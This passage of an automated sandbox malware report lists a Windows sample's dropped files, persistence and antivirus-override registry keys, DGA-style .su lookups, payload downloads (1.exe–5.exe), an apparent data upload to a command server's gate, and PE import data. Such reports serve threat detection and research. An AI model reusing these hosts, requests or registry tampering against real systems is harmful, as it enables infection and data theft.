- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\ucrtbase.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\vcruntime140.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\sqlite3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2683410667.exe",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER9CEE.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER9CEE.tmp.appcompat.txt",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA00C.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA00C.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA03C.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA03C.tmp.hdmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAB78.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAB78.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_cd449376f6223cf7a93dfe5d65a7144586b089d_cab_03050dcc\\Report.wer.tmp"
- ]
- [*] Modified Registry Keys: [
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\AntiVirusOverride",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\UpdatesOverride",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\FirewallOverride",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\AntiVirusDisableNotify",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\UpdatesDisableNotify",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\AutoUpdateDisableNotify",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\FirewallDisableNotify",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\\DisableSR",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\VaultSvc\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent"
- ]
- [*] Deleted Registry Keys: []
- [*] DNS Communications: [
- {
- "type": "A",
- "request": "aiheiufisd.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "aeoghehofu.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "aniaeninie.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "aiaeufaehe.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "aieieieros.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "abaeubuegs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "aeubeufubg.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "aeuaueudgs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "xiheiufisd.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "xeoghehofu.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "xniaeninie.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "xiaeufaehe.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "xieieieros.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "xbaeubuegs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "teubeufubg.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "teuaueudgs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "tiheiufisd.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "teoghehofu.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "tniaeninie.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "tiaeufaehe.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "tieieieros.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "tbaeubuegs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "wiheiufisd.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "weoghehofu.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "wniaeninie.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "wiaeufaehe.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "wieieieros.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "wbaeubuegs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "weubeufubg.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "weuaueudgs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "doc-14-24-docs.googleusercontent.com",
- "answers": [
- {
- "data": "googlehosted.l.googleusercontent.com",
- "type": "CNAME"
- },
- {
- "data": "172.217.164.225",
- "type": "A"
- }
- ]
- }
- ]
- [*] Domains: [
- {
- "ip": "",
- "domain": "xniaeninie.su"
- },
- {
- "ip": "",
- "domain": "tniaeninie.su"
- },
- {
- "ip": "",
- "domain": "aiaeufaehe.su"
- },
- {
- "ip": "",
- "domain": "teubeufubg.su"
- },
- {
- "ip": "",
- "domain": "aeoghehofu.su"
- },
- {
- "ip": "",
- "domain": "wbaeubuegs.su"
- },
- {
- "ip": "",
- "domain": "wieieieros.su"
- },
- {
- "ip": "",
- "domain": "wiaeufaehe.su"
- },
- {
- "ip": "172.217.165.1",
- "domain": "doc-14-24-docs.googleusercontent.com"
- },
- {
- "ip": "",
- "domain": "wniaeninie.su"
- },
- {
- "ip": "",
- "domain": "tbaeubuegs.su"
- },
- {
- "ip": "",
- "domain": "tiheiufisd.su"
- },
- {
- "ip": "",
- "domain": "aiheiufisd.su"
- },
- {
- "ip": "",
- "domain": "weoghehofu.su"
- },
- {
- "ip": "",
- "domain": "aeuaueudgs.su"
- },
- {
- "ip": "",
- "domain": "teoghehofu.su"
- },
- {
- "ip": "",
- "domain": "xiaeufaehe.su"
- },
- {
- "ip": "",
- "domain": "tieieieros.su"
- },
- {
- "ip": "",
- "domain": "aniaeninie.su"
- },
- {
- "ip": "",
- "domain": "wiheiufisd.su"
- },
- {
- "ip": "",
- "domain": "xiheiufisd.su"
- },
- {
- "ip": "",
- "domain": "aieieieros.su"
- },
- {
- "ip": "",
- "domain": "xieieieros.su"
- },
- {
- "ip": "",
- "domain": "weuaueudgs.su"
- },
- {
- "ip": "",
- "domain": "tiaeufaehe.su"
- },
- {
- "ip": "",
- "domain": "abaeubuegs.su"
- },
- {
- "ip": "",
- "domain": "aeubeufubg.su"
- },
- {
- "ip": "",
- "domain": "xbaeubuegs.su"
- },
- {
- "ip": "",
- "domain": "xeoghehofu.su"
- },
- {
- "ip": "",
- "domain": "teuaueudgs.su"
- },
- {
- "ip": "",
- "domain": "weubeufubg.su"
- }
- ]
- [*] Network Communication - ICMP: [
- {
- "src": "192.168.56.102",
- "dst": "1.1.1.1",
- "type": 8,
- "data": "abcdefghijklmnopqrstuvwabcdefghi"
- },
- {
- "src": "1.1.1.1",
- "dst": "192.168.56.102",
- "type": 0,
- "data": "abcdefghijklmnopqrstuvwabcdefghi"
- }
- ]
- [*] Network Communication - HTTP: [
- {
- "count": 1,
- "body": "",
- "uri": "http://193.32.161.77/tldr.php?new=1",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/tldr.php?new=1",
- "data": "GET /tldr.php?new=1 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://193.32.161.77/tldr.php?on=1",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/tldr.php?on=1",
- "data": "GET /tldr.php?on=1 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- },
- {
- "count": 2,
- "body": "",
- "uri": "http://193.32.161.77/1.exe",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/1.exe",
- "data": "GET /1.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- },
- {
- "count": 2,
- "body": "",
- "uri": "http://193.32.161.77/2.exe",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/2.exe",
- "data": "GET /2.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- },
- {
- "count": 2,
- "body": "",
- "uri": "http://193.32.161.77/3.exe",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/3.exe",
- "data": "GET /3.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://193.32.161.77/4.exe",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/4.exe",
- "data": "GET /4.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://193.32.161.77/5.exe",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/5.exe",
- "data": "GET /5.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://34.65.152.120/gate/log.php",
- "user-agent": "",
- "method": "POST",
- "host": "34.65.152.120",
- "version": "1.1",
- "path": "/gate/log.php",
- "data": "POST /gate/log.php HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\nPragma: no-cache\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 151\r\nHost: 34.65.152.120\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://34.65.152.120/gate/sqlite3.dll",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
- "method": "GET",
- "host": "34.65.152.120",
- "version": "1.1",
- "path": "/gate/sqlite3.dll",
- "data": "GET /gate/sqlite3.dll HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: 34.65.152.120\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://34.65.152.120/gate/libs.zip",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
- "method": "GET",
- "host": "34.65.152.120",
- "version": "1.1",
- "path": "/gate/libs.zip",
- "data": "GET /gate/libs.zip HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: 34.65.152.120\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://34.65.152.120/file_handler/file.php?hash=a0946e9787798262e287064a4c241a14dd4b012e&js=b4c2f4ef1ddb6bd1713011242356f39f3d72c032&callback=http://34.65.152.120/gate",
- "user-agent": "",
- "method": "POST",
- "host": "34.65.152.120",
- "version": "1.1",
- "path": "/file_handler/file.php?hash=a0946e9787798262e287064a4c241a14dd4b012e&js=b4c2f4ef1ddb6bd1713011242356f39f3d72c032&callback=http://34.65.152.120/gate",
- "data": "POST /file_handler/file.php?hash=a0946e9787798262e287064a4c241a14dd4b012e&js=b4c2f4ef1ddb6bd1713011242356f39f3d72c032&callback=http://34.65.152.120/gate HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\nPragma: no-cache\r\nContent-Type: multipart/form-data, boundary=Jfbvjwj3489078yuyetu\r\nContent-Length: 105677\r\nHost: 34.65.152.120\r\n\r\n",
- "port": 80
- }
- ]
- [*] Network Communication - SMTP: []
- [*] Network Communication - Hosts: []
- [*] Network Communication - IRC: []
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "DebugActiveProcess",
- "address": "0x42a010"
- },
- {
- "name": "LockFile",
- "address": "0x42a014"
- },
- {
- "name": "CloseHandle",
- "address": "0x42a018"
- },
- {
- "name": "GetHandleInformation",
- "address": "0x42a01c"
- },
- {
- "name": "GetTickCount",
- "address": "0x42a020"
- },
- {
- "name": "lstrlenA",
- "address": "0x42a024"
- },
- {
- "name": "GetModuleHandleA",
- "address": "0x42a028"
- },
- {
- "name": "CreateHardLinkW",
- "address": "0x42a02c"
- },
- {
- "name": "GetNumberFormatW",
- "address": "0x42a030"
- },
- {
- "name": "ExitProcess",
- "address": "0x42a034"
- },
- {
- "name": "CreateToolhelp32Snapshot",
- "address": "0x42a038"
- },
- {
- "name": "Module32First",
- "address": "0x42a03c"
- },
- {
- "name": "ReadFile",
- "address": "0x42a040"
- },
- {
- "name": "CreateFileW",
- "address": "0x42a044"
- },
- {
- "name": "GetStringTypeW",
- "address": "0x42a048"
- },
- {
- "name": "OutputDebugStringW",
- "address": "0x42a04c"
- },
- {
- "name": "WriteConsoleW",
- "address": "0x42a050"
- },
- {
- "name": "SetFilePointerEx",
- "address": "0x42a054"
- },
- {
- "name": "GetBinaryTypeA",
- "address": "0x42a058"
- },
- {
- "name": "VirtualProtect",
- "address": "0x42a05c"
- },
- {
- "name": "PeekConsoleInputA",
- "address": "0x42a060"
- },
- {
- "name": "LocalAlloc",
- "address": "0x42a064"
- },
- {
- "name": "SetStdHandle",
- "address": "0x42a068"
- },
- {
- "name": "HeapReAlloc",
- "address": "0x42a06c"
- },
- {
- "name": "EncodePointer",
- "address": "0x42a070"
- },
- {
- "name": "DecodePointer",
- "address": "0x42a074"
- },
- {
- "name": "RaiseException",
- "address": "0x42a078"
- },
- {
- "name": "RtlUnwind",
- "address": "0x42a07c"
- },
- {
- "name": "GetCommandLineW",
- "address": "0x42a080"
- },
- {
- "name": "IsProcessorFeaturePresent",
- "address": "0x42a084"
- },
- {
- "name": "GetLastError",
- "address": "0x42a088"
- },
- {
- "name": "HeapAlloc",
- "address": "0x42a08c"
- },
- {
- "name": "HeapFree",
- "address": "0x42a090"
- },
- {
- "name": "GetModuleHandleExW",
- "address": "0x42a094"
- },
- {
- "name": "GetProcAddress",
- "address": "0x42a098"
- },
- {
- "name": "AreFileApisANSI",
- "address": "0x42a09c"
- },
- {
- "name": "MultiByteToWideChar",
- "address": "0x42a0a0"
- },
- {
- "name": "WideCharToMultiByte",
- "address": "0x42a0a4"
- },
- {
- "name": "HeapSize",
- "address": "0x42a0a8"
- },
- {
- "name": "EnterCriticalSection",
- "address": "0x42a0ac"
- },
- {
- "name": "LeaveCriticalSection",
- "address": "0x42a0b0"
- },
- {
- "name": "FlushFileBuffers",
- "address": "0x42a0b4"
- },
- {
- "name": "WriteFile",
- "address": "0x42a0b8"
- },
- {
- "name": "GetConsoleCP",
- "address": "0x42a0bc"
- },
- {
- "name": "GetConsoleMode",
- "address": "0x42a0c0"
- },
- {
- "name": "DeleteCriticalSection",
- "address": "0x42a0c4"
- },
- {
- "name": "FatalAppExitA",
- "address": "0x42a0c8"
- },
- {
- "name": "IsDebuggerPresent",
- "address": "0x42a0cc"
- },
- {
- "name": "SetLastError",
- "address": "0x42a0d0"
- },
- {
- "name": "GetCurrentThread",
- "address": "0x42a0d4"
- },
- {
- "name": "GetCurrentThreadId",
- "address": "0x42a0d8"
- },
- {
- "name": "GetProcessHeap",
- "address": "0x42a0dc"
- },
- {
- "name": "GetStdHandle",
- "address": "0x42a0e0"
- },
- {
- "name": "GetFileType",
- "address": "0x42a0e4"
- },
- {
- "name": "GetStartupInfoW",
- "address": "0x42a0e8"
- },
- {
- "name": "GetModuleFileNameW",
- "address": "0x42a0ec"
- },
- {
- "name": "QueryPerformanceCounter",
- "address": "0x42a0f0"
- },
- {
- "name": "GetCurrentProcessId",
- "address": "0x42a0f4"
- },
- {
- "name": "GetSystemTimeAsFileTime",
- "address": "0x42a0f8"
- },
- {
- "name": "GetEnvironmentStringsW",
- "address": "0x42a0fc"
- },
- {
- "name": "FreeEnvironmentStringsW",
- "address": "0x42a100"
- },
- {
- "name": "UnhandledExceptionFilter",
- "address": "0x42a104"
- },
- {
- "name": "SetUnhandledExceptionFilter",
- "address": "0x42a108"
- },
- {
- "name": "InitializeCriticalSectionAndSpinCount",
- "address": "0x42a10c"
- },
- {
- "name": "CreateEventW",
- "address": "0x42a110"
- },
- {
- "name": "Sleep",
- "address": "0x42a114"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x42a118"
- },
- {
- "name": "TerminateProcess",
- "address": "0x42a11c"
- },
- {
- "name": "TlsAlloc",
- "address": "0x42a120"
- },
- {
- "name": "TlsGetValue",
- "address": "0x42a124"
- },
- {
- "name": "TlsSetValue",
- "address": "0x42a128"
- },
- {
- "name": "TlsFree",
- "address": "0x42a12c"
- },
- {
- "name": "GetModuleHandleW",
- "address": "0x42a130"
- },
- {
- "name": "CreateSemaphoreW",
- "address": "0x42a134"
- },
- {
- "name": "SetConsoleCtrlHandler",
- "address": "0x42a138"
- },
- {
- "name": "GetDateFormatW",
- "address": "0x42a13c"
- },
- {
- "name": "GetTimeFormatW",
- "address": "0x42a140"
- },
- {
- "name": "CompareStringW",
- "address": "0x42a144"
- },
- {
- "name": "LCMapStringW",
- "address": "0x42a148"
- },
- {
- "name": "GetLocaleInfoW",
- "address": "0x42a14c"
- },
- {
- "name": "IsValidLocale",
- "address": "0x42a150"
- },
- {
- "name": "GetUserDefaultLCID",
- "address": "0x42a154"
- },
- {
- "name": "EnumSystemLocalesW",
- "address": "0x42a158"
- },
- {
- "name": "FreeLibrary",
- "address": "0x42a15c"
- },
- {
- "name": "LoadLibraryExW",
- "address": "0x42a160"
- },
- {
- "name": "IsValidCodePage",
- "address": "0x42a164"
- },
- {
- "name": "GetACP",
- "address": "0x42a168"
- },
- {
- "name": "GetOEMCP",
- "address": "0x42a16c"
- },
- {
- "name": "GetCPInfo",
- "address": "0x42a170"
- },
- {
- "name": "ReadConsoleW",
- "address": "0x42a174"
- }
- ],
- "dll": "KERNEL32.dll"
- },
- {
- "imports": [
- {
- "name": "DialogBoxIndirectParamW",
- "address": "0x42a184"
- },
- {
- "name": "IsZoomed",
- "address": "0x42a188"
- },
- {
- "name": "RegisterDeviceNotificationW",
- "address": "0x42a18c"
- },
- {
- "name": "DrawStateA",
- "address": "0x42a190"
- },
- {
- "name": "GetMonitorInfoW",
- "address": "0x42a194"
- }
- ],
- "dll": "USER32.dll"
- },
- {
- "imports": [
- {
- "name": "AbortSystemShutdownA",
- "address": "0x42a000"
- },
- {
- "name": "RegCreateKeyExA",
- "address": "0x42a004"
- },
- {
- "name": "RegisterServiceCtrlHandlerW",
- "address": "0x42a008"
- }
- ],
- "dll": "ADVAPI32.dll"
- },
- {
- "imports": [
- {
- "name": "TransparentBlt",
- "address": "0x42a17c"
- }
- ],
- "dll": "MSIMG32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x000456cb",
- "overlay": null,
- "imagebase": "0x00400000",
- "reported_checksum": "0x000456cb",
- "icon_hash": null,
- "entrypoint": "0x00404ea5",
- "timestamp": "2018-11-21 05:28:09",
- "osversion": "5.1",
- "sections": [
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00028800",
- "entropy": "6.65",
- "raw_address": "0x00000400",
- "virtual_size": "0x0002866f",
- "characteristics_raw": "0x60000020"
- },
- {
- "name": ".rdata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x0002a000",
- "size_of_data": "0x00011800",
- "entropy": "6.22",
- "raw_address": "0x00028c00",
- "virtual_size": "0x00011630",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".data",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0003c000",
- "size_of_data": "0x00001e00",
- "entropy": "3.06",
- "raw_address": "0x0003a400",
- "virtual_size": "0x00804ea0",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".rsrc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00841000",
- "size_of_data": "0x00003e00",
- "entropy": "6.27",
- "raw_address": "0x0003c200",
- "virtual_size": "0x00003d40",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".reloc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00845000",
- "size_of_data": "0x00002200",
- "entropy": "6.64",
- "raw_address": "0x00040000",
- "virtual_size": "0x000021a4",
- "characteristics_raw": "0x42000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0003accc",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x00000064"
- },
- {
- "virtual_address": "0x00841000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x00003d40"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00845000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x000021a4"
- },
- {
- "virtual_address": "0x0002a1f0",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000038"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0002a000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x0000019c"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "e226e36fbb8dbb02d3784367b0c7fa81",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": "C:\\vagar_helayagu-limi.pdb\\x00ntime\\crypt\\tmp_92407619\\bin\\vuvigilil.pdb\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xab\\x00\\x00\\x00\\xab\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\xd7C\\x00\\xf8\\x9aC",
- "imported_dll_count": 4,
- "versioninfo": []
- }
- }
- [*] Resolved APIs: [
- "kernel32.dll.FlsAlloc",
- "kernel32.dll.FlsFree",
- "kernel32.dll.FlsGetValue",
- "kernel32.dll.FlsSetValue",
- "kernel32.dll.InitializeCriticalSectionEx",
- "kernel32.dll.CreateEventExW",
- "kernel32.dll.CreateSemaphoreExW",
- "kernel32.dll.SetThreadStackGuarantee",
- "kernel32.dll.CreateThreadpoolTimer",
- "kernel32.dll.SetThreadpoolTimer",
- "kernel32.dll.WaitForThreadpoolTimerCallbacks",
- "kernel32.dll.CloseThreadpoolTimer",
- "kernel32.dll.CreateThreadpoolWait",
- "kernel32.dll.SetThreadpoolWait",
- "kernel32.dll.CloseThreadpoolWait",
- "kernel32.dll.FlushProcessWriteBuffers",
